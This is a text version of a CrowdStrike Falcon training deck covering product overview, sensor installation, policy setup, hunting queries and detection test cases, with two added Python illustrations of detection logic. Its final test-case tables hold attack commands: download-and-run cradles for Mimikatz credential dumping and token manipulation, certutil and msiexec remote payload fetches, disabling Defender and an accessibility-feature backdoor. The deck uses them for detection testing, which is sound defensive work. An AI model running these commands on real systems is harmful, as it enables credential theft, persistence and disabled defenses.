CrowdStrike Training PDF

This document outlines an agenda for a CrowdStrike training covering various security roles. The agenda includes an overview section and sections on the administrator, responder, hunter, and integrator roles. It emphasizes how CrowdStrike's technology can help stop breaches through next-generation antivirus, automated hunting, and indicators of attack to detect threats across endpoints, clouds, and identities. Traditional defenses are overwhelmed by modern attacks, necessitating CrowdStrike's prevention, detection, and response capabilities.
CROWDSTRIKE TRAINING

Pattadon M.

AGENDA
▪ Overview
▪ Administrator
▪ Responder
▪ Hunter
▪ Integrator

2020 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


OVERVIEW


WE STOP BREACHES

2022 CrowdStrike, Inc. All rights reserved.


Overview

OVERWHELMING SIGNATURE WORKLOADS OVERBURDEN OUTMODED DEFENSES
You need complete breach prevention.

[Chart: attacks by type, plotted against threat sophistication from low to high]
- Malware: 32%
- Malware-free (non-malware attacks): 68%, harder to prevent and detect
- Adversary categories, by increasing sophistication: terrorists, hacktivists/vigilantes, cyber-criminals, organized criminal gangs, nation-states
Overview

SOPHISTICATED ATTACKS REQUIRE MORE EXPERTISE THAN TECHNOLOGY

[Chart: protection techniques plotted against attack sophistication and difficulty]
- Attack sophistication, low to high: file-based malware (malware, zero-day malware); fileless and exploits (exploitation of vulnerabilities, zero-day malware); live attacker/insider (credential theft, living off the land, hands-on keyboard)
- Protection techniques, easy to hard: signatures, reputation, sandbox, host IPS, IOCs/blacklisting, machine learning, whitelisting, exploit blocking, behavioral analysis, threat hunting, SIEM correlation, proactive threat hunting


Overview

SURVIVAL OF THE FASTEST

To stay ahead you must: detect in 1 min, investigate in 10 min, respond in 60 min.

[Chart: MITRE ATT&CK phases over time, with adversary breakout time marked against the detect/investigate/respond targets and the attack ending in data leakage. Phases: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command & Control, Impact]


ONE AGENT, FULL VISIBILITY
Falcon Agent: Prevent • Predict • Detect • Respond
- Endpoints: workstations, mobile, servers, IoT
- Clouds: data centers, workloads, containers, 3rd parties
- Identities: Active Directory, user accounts
Overview

NEXT-GEN AV: CROWDSTRIKE FALCON PREVENT
Certified as legacy AV replacement

Prevention layers: machine learning, block known bad, IOA behavioral blocking, exploit blocking

BUSINESS VALUE
- Improves protection
- Reduces number of incidents
- Improves user productivity – no user impact
- Reduces complexity
- Delivers security efficiency and efficacy


Overview

AUTOMATED HUNTING ENGINE: THREAT GRAPH
- 135 million IOA decisions/min
- 5 trillion+ events/week
- 150+ adversaries tracked


Overview

INDICATORS OF ATTACK (IOA)

Process indicators of attack, an example chain: process executes → process deletes backups → process calls encryption routine → process enumerates file system

Proactive indicators of attack: code execution, persistence, stealth, command and control, lateral movement
vs.
Reactive indicators of compromise (IOCs): malware, signatures, exploits, vulnerabilities, IP addresses
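To make the IOA-versus-IOC contrast concrete, here is an added example (not CrowdStrike code) that runs a reactive hash lookup and a behavioural chain matcher over a constructed process event stream; the event names, hashes and PIDs are invented for the illustration.

```python
from collections import defaultdict

# Constructed IOC list: hashes of samples already seen. Reactive by nature:
# a repacked binary gets a fresh hash and is not on the list.
KNOWN_BAD_SHA256 = {"deadbeef" * 8: "OldLocker.A"}

# The behaviours the slide chains together, in the order it draws them.
IOA_CHAIN = ("DeleteBackups", "CallEncryptionRoutine", "EnumerateFileSystem")

# Constructed telemetry: (pid, sha256 of the process image, observed behaviour).
EVENTS = [
    (100, "deadbeef" * 8, "ProcessExecutes"),      # known sample, does nothing yet
    (200, "cafef00d" * 8, "ProcessExecutes"),      # repacked sample, hash unknown
    (200, "cafef00d" * 8, "DeleteBackups"),
    (300, "01234567" * 8, "ProcessExecutes"),      # backup tool: prunes backups,
    (300, "01234567" * 8, "DeleteBackups"),        # never calls an encryption routine
    (200, "cafef00d" * 8, "CallEncryptionRoutine"),
    (300, "01234567" * 8, "EnumerateFileSystem"),
    (200, "cafef00d" * 8, "EnumerateFileSystem"),
]


def ioc_hits(events, known_bad=KNOWN_BAD_SHA256):
    """Reactive IOC check: PIDs whose image hash is on the known-bad list."""
    return sorted({pid for pid, sha, _ in events if sha in known_bad})


def ioa_hits(events, chain=IOA_CHAIN):
    """Behavioural IOA: PIDs that perform every step of the chain, in order,
    whatever binary they run from. A process that only does some of the
    steps (the backup tool) is not flagged."""
    progress = defaultdict(int)  # pid -> index of the next step we expect
    flagged = []
    for pid, _, behaviour in events:
        step = progress[pid]
        if step < len(chain) and behaviour == chain[step]:
            progress[pid] = step + 1
            if progress[pid] == len(chain):
                flagged.append(pid)
    return flagged


if __name__ == "__main__":
    print("IOC hits:", ioc_hits(EVENTS))  # only the already-known hash
    print("IOA hits:", ioa_hits(EVENTS))  # the repacked sample, by behaviour
```

The known sample is caught only by the hash list, the repacked one only by its behaviour, and the backup tool by neither, which is the complementarity the slide argues for.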


Overview

ENDPOINT DETECTION AND RESPONSE: FALCON INSIGHT
Capabilities: real-time and historical search, record everything, real-time response and containment, threat hunting

BUSINESS VALUE
- Reduce time-to-respond
- Improve SOC productivity
- Reduced time to remediation
- Augment skills and expertise
- Reduce risk
- Gain security efficiency and efficacy


Overview

POWERFUL RESPONSE AND REMEDIATION
Collect info: processes, file system, registry, network activities, memory, OS events
Take action: kill process, delete file, blacklist file, modify registry, network quarantine, custom scripts


Overview

3 SMALL STEPS TO REPLACE YOUR AV
1. Install the Falcon Agent
2. Verify the installation
3. Remove legacy products
No infrastructure setup, no fine-tuning or rule writing, no reboot, no signature updates, no scan.

Rollout examples:
- Financial institution: 77,000 agents in 1 day
- Hospitality chain: 40,000 agents in 5 days
- Technology company: 55,000 agents in 5 days
- Financial institution: 300,000 agents in 90 days


Overview

Falcon console: https://falcon.us-2.crowdstrike.com/
Sensor cloud endpoints (outbound, port 443):
ts01-gyr-maverick.cloudsink.net:443
lfodown01-gyr-maverick.cloudsink.net:443


Console tour (screenshot slides)

Falcon Platform – Dashboards
Falcon Platform – Host Mgmt.
NGAV – Machine learning
NGAV – Malicious behavior
Investigation – Incidents
Investigation – Host search
Investigation – Event search
Responder – Real Time Response
Hunting – Threat hunting
Workflow – Workflows: automating actions
- Notifications
- Get/remove files
- Retrieve connection
- Retrieve processes
- Contain hosts
- Context enrichment


ADMINISTRATOR

Administrator
▪ Set up users
▪ Configure alerts
▪ Create host groups
▪ Create prevention policies
▪ Create sensor update policies
▪ Exclusions
▪ Install sensors


Administrator – Set up users
Falcon Users > User Management
Documentation: https://falcon.us-2.crowdstrike.com/documentation/74/users-and-roles


Administrator – Configure alerts
- Detection email alerts: Configuration > General Settings
- Workflow alerts: Configuration > Workflows


Administrator – Host groups and policies

[Diagram] New host → default policy. Creating a host group → assigning hosts to a host group. Creating a policy → assigning a policy to a host group.
Policy types: Prevention Policy, Sensor Update Policy, Response Policy, Firewall Policy, USB Device Policy


Administrator – Create host groups
Host setup and management > Host groups
- Dynamic: defined by attribute, like OS version, OU or hostname prefix/suffix. When hosts match the rule they are automatically added to the group.
- Static: defined manually, by uploading a list of hostnames or selecting hosts.


Administrator – Prevention Policy
Endpoint security > Prevention policies
- Detect only
- Full protection


Administrator – Sensor Update Policy
- Control sensor version updates
- Protect from unauthorized uninstall
Recommendation: create one dedicated policy used for uninstallation.


Administrator – Response Policy
Administrator – USB Device Policy
Administrator – Assign policy to host group


Administrator – Exclusions
Configuration > Exclusions
Create exclusion: choose the hosts to target.
Pattern example: use **\HiveNightmare.exe to exclude HiveNightmare.exe


Administrator – Install sensors
Falcon console: https://falcon.us-2.crowdstrike.com/
Sensor cloud endpoints (outbound, port 443):
ts01-gyr-maverick.cloudsink.net:443
lfodown01-gyr-maverick.cloudsink.net:443


Administrator – Install sensors: system requirements
- 64-bit Windows Server: Windows Server 2022, 2019, 2016, 2012, 2008 R2 SP1
- Windows desktop: Windows 11, 10, 8.1, 7 SP1
- Linux: Amazon Linux, CentOS, Debian, Oracle, RHEL, SLES, Ubuntu
- macOS: Monterey 12, Big Sur 11, Catalina 10.15, Mojave (ended 25 Oct 2021)


Administrator – Install sensors: network configuration
Need to open outbound communication over port 443.

Cloud | Login | Public DNS names
US-1 | falcon.crowdstrike.com | ts01-b.cloudsink.net, lfodown01-b.cloudsink.net
US-2 | falcon.us-2.crowdstrike.com | ts01-gyr-maverick.cloudsink.net, lfodown01-gyr-maverick.cloudsink.net


Administrator – Install sensors
If you have SSL encryption, SSL decryption, or any deep packet inspection, you need to set up a bypass for all sensor traffic: CrowdStrike uses certificate pinning to protect against threats such as man-in-the-middle attacks, so the sensor's connection to the cloud must not be intercepted.


INSTALLATION – WINDOWS

Administrator – Install sensors – Windows
Always start with pre-production:
• Do some test installations.
• Make sure all critical applications are still running as necessary.
Two paths: manual installation or automatic installation.


Administrator – Install sensors – Windows: sensor downloads
1. Download the sensor installer from Hosts > Sensor Downloads (use the Chrome browser).
2. Copy the Customer ID (CID), shown in the form 123456789012-A0.


Installation – Install sensors – Windows
3.1 Manual installation: after installation the sensor runs silently. Validate that the sensor is running with:
sc query csagent
3.2 Automatic installation: run or configure your deployment tool with:
WindowsSensor.exe /install /quiet /norestart CID=<CCID>


Installation – Install sensors – Windows: installer parameters
Proxy configuration:
APP_PROXYNAME=<Proxy FQDN or IP>
APP_PROXYPORT=<Proxy Port>
PACURL=<Pac file URL>
Preparing master images for cloning:
NO_START=1 – the sensor will not start until the host boots
VDI:
VDI=1 – the AID will be assigned based on the host's FQDN
Uninstall:
CSUninstallTool.exe
Directory: C:\windows\system32\drivers\crowdstrike
Registry key: HKLM\System\CrowdStrike


Administrator – Install sensors – Windows: Host Management
Check the installation logs in %LOCALAPPDATA%\temp\


INSTALLATION – MAC CATALINA

Administrator – Install sensors – Catalina: sensor downloads
1. Download the sensor installer from Hosts > Sensor Downloads (use the Chrome browser).
2. Copy the Customer ID (CID), shown in the form 123456789012-A0.


Administrator – Install sensors – Catalina: run the sensor installer
3. Double-click the .pkg file. If "Kernel Extension Blocked" appears, choose "Open Security Preferences" > Allow.
4. Provide the CID:
sudo /Applications/Falcon.app/Contents/Resources/falconctl license 123456-A0


Administrator – Install sensors – Catalina: run the sensor installer
5. Grant Full Disk Access: System Preferences… > Security & Privacy > Full Disk Access > Falcon


Administrator – Install sensors – Catalina: run the sensor installer
6. Verify the sensor installation:
sudo /Applications/Falcon.app/Contents/Resources/falconctl stats
Verify the sensor components (kernel extension):
kextstat | grep crowd

Administrator – Install sensors – Catalina: Host Management (screenshot)


INSTALLATION – MAC BIG SUR

Administrator – Install sensors – Big Sur: sensor downloads
1. Download the sensor installer from Hosts > Sensor Downloads (use the Chrome browser).
2. Copy the Customer ID (CID), shown in the form 123456789012-A0.


Administrator – Install sensors – Big Sur
3. Double-click the .pkg file.
4. Provide the CID:
sudo /Applications/Falcon.app/Contents/Resources/falconctl license 123456-A0
When prompted with "Filter Network Content", choose "Allow". If "System Extension Blocked" appears, choose "Open Security Preferences" > Allow.


Administrator – Install sensors – Big Sur
5. Grant Full Disk Access: System Preferences… > Security & Privacy > Full Disk Access > Falcon, Agent


Administrator – Install sensors – Big Sur
6. Verify the sensor installation:
sudo /Applications/Falcon.app/Contents/Resources/falconctl stats
Verify the sensor components (system extension):
systemextensionsctl list | grep crowd


Administrator – Install sensors – Big Sur: unload and uninstall
sudo /Applications/Falcon.app/Contents/Resources/falconctl unload
sudo /Applications/Falcon.app/Contents/Resources/falconctl uninstall

Delete the host: Hosts > Host Management, select the host and delete it.


INSTALLATION – LINUX

Administrator – Install sensors – Linux: sensor downloads
1. Download the sensor installer from Hosts > Sensor Downloads (use the Chrome browser).
2. Copy the Customer ID (CID).


Administrator – Install sensors – Linux: run the sensor installer
3. Run the installer:
Ubuntu: sudo dpkg -i <installer>
RHEL, CentOS, Amazon Linux: sudo yum install <installer>
SLES: sudo zypper install <installer>
4. Set the CID on the sensor:
sudo /opt/CrowdStrike/falconctl -s --cid=<CID>
5. Start the sensor manually:
Ubuntu: service falcon-sensor start
RHEL, CentOS: systemctl start falcon-sensor
6. Confirm that the sensor is running:
ps -e | grep falcon-sensor


Installation – Install sensors – Linux: proxy configuration
Set the proxy host and port:
sudo /opt/CrowdStrike/falconctl -s --aph=<Proxy IP> --app=<Proxy Port>
Show the current proxy settings:
sudo /opt/CrowdStrike/falconctl -g --aph --app
Enable the proxy:
sudo /opt/CrowdStrike/falconctl -s --apd=FALSE

Uninstall:
Ubuntu: sudo apt-get purge falcon-sensor
RHEL, CentOS, Amazon Linux: sudo yum remove falcon-sensor
SLES: sudo zypper remove falcon-sensor


MONITOR AND TRIAGE DETECTIONS

Responder – Detections: Activity > Detections
- File-based detections (screenshot walkthrough); Quarantine
- Fileless detections (screenshot walkthrough); IOA Exclusion
Responder – RTR (Real Time Response)
Responder – Containment: contain an infected host


HUNTER

Hunter – Incidents
Hunter – Host Search
Hunter – User Search
Hunter – Hunt
Hunter – Event Search


Hunter – Event Search

Show me any instances of common reconnaissance tools:
event_simpleName=ProcessRollup2 (FileName=net.exe OR FileName=ipconfig.exe OR FileName=whoami.exe OR FileName=quser.exe OR FileName=ping.exe OR FileName=netstat.exe OR FileName=tasklist.exe OR FileName=Hostname.exe OR FileName=at.exe) | table ComputerName UserName FileName CommandLine

Show me processes that only ran a few times:
event_simpleName=ProcessRollup2 OR event_simpleName=SyntheticProcessRollup2 | stats count by SHA256HashData ImageFileName ComputerName UserName | where count<5 | sort -count
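The two Event Search hunts above, re-implemented as an added example (not CrowdStrike's code) in Python over constructed ProcessRollup2 records, so the filtering and the count-by-then-threshold logic can be checked offline; the field names follow the slide, while the hostnames, users, hashes and command lines are made up.

```python
from collections import Counter

# Tool names from the slide's first query. FileName is compared
# case-insensitively, as the query's mixed-case Hostname.exe implies.
RECON_TOOLS = {"net.exe", "ipconfig.exe", "whoami.exe", "quser.exe", "ping.exe",
               "netstat.exe", "tasklist.exe", "hostname.exe", "at.exe"}


def ev(kind, host, user, image, cmd, sha):
    """Build one constructed process record with the field names the slide uses."""
    return {"event_simpleName": kind, "ComputerName": host, "UserName": user,
            "FileName": image.rsplit("\\", 1)[-1], "ImageFileName": image,
            "CommandLine": cmd, "SHA256HashData": sha}


# Constructed telemetry: a handful of ProcessRollup2 / SyntheticProcessRollup2 records.
EVENTS = (
    [ev("ProcessRollup2", "WS01", "alice", r"C:\Windows\System32\whoami.exe", "whoami /all", "h-whoami")]
    + [ev("ProcessRollup2", "WS01", "alice", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs", "h-svchost")] * 6
    + [ev("ProcessRollup2", "SRV02", "svc_backup", r"C:\Windows\System32\net.exe", "net user /domain", "h-net")]
    + [ev("SyntheticProcessRollup2", "SRV02", "svc_backup", r"C:\Users\Public\update.exe", "update.exe", "h-unknown")]
    + [ev("ProcessRollup2", "WS03", "bob", r"C:\Windows\System32\HOSTNAME.EXE", "HOSTNAME.EXE", "h-hostname")]
    + [ev("ProcessRollup2", "WS03", "bob", r"C:\Program Files\Git\bin\git.exe", "git pull", "h-git")] * 4
)


def recon_tool_hits(events):
    """Hunt 1: ProcessRollup2 records whose FileName is a common recon tool;
    the query's `table` clause becomes a projection to four fields."""
    return [{k: e[k] for k in ("ComputerName", "UserName", "FileName", "CommandLine")}
            for e in events
            if e["event_simpleName"] == "ProcessRollup2"
            and e["FileName"].lower() in RECON_TOOLS]


def rare_processes(events, threshold=5):
    """Hunt 2: `stats count by SHA256HashData ImageFileName ComputerName UserName`
    over both event types, keep rows with count < threshold, sort by count
    descending (`sort -count`). Binaries rarely run per host and user surface first."""
    fields = ("SHA256HashData", "ImageFileName", "ComputerName", "UserName")
    counts = Counter(tuple(e[f] for f in fields) for e in events
                     if e["event_simpleName"] in ("ProcessRollup2", "SyntheticProcessRollup2"))
    rows = [dict(zip(fields + ("count",), key + (n,)))
            for key, n in counts.items() if n < threshold]
    return sorted(rows, key=lambda r: r["count"], reverse=True)


if __name__ == "__main__":
    for row in recon_tool_hits(EVENTS):
        print("recon:", row)
    for row in rare_processes(EVENTS):
        print("rare :", row["count"], row["ImageFileName"], row["ComputerName"])
```

The unknown update.exe reaches the rare-process list only because the second query includes SyntheticProcessRollup2 events, which is why the slide ORs both event types.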


INTEGRATOR

Integrator – REST-based API, OAuth 2.0: Support > API Clients and Keys
Integrator – CrowdStrike Store (extend the functionality): CrowdStrike Store > Partner Apps; CrowdStrike Store > Plugins
Dashboard (screenshot)


Responder – TEST CASES

Technique | Test
Credential Dumping | Dumping credentials from Task Manager: create a dump of lsass.exe from Task Manager
Credential Dumping | Dumping credentials with mimikatz injected in memory: powershell.exe "iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
Remote file copy | certutil.exe -urlcache -split -f https://raw.githubusercontent.com/NextronSystems/APTSimulator/master/download/cactus.js C:\Users\Public\en-US.js
Masquerading | Copy C:\Windows\System32\calc.exe as svchost.exe and run it
Intel-based detection | ping webonline.mefound.com, systemlowcheck.com

Technique | Test
Defense Evasion | Defense Evasion via Process Hollowing: msiexec /q /I https://google.com/malware.exe
Defense Evasion | Defense Evasion via Disable or Modify Tools: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Persistence | Persistence via Accessibility Features: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
Privilege Escalation | Privilege Escalation via Token Theft: powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1'); Invoke-TokenManipulation -Enumerate"


Demo slides (screenshots): Machine learning, Custom IOA, Real Time Response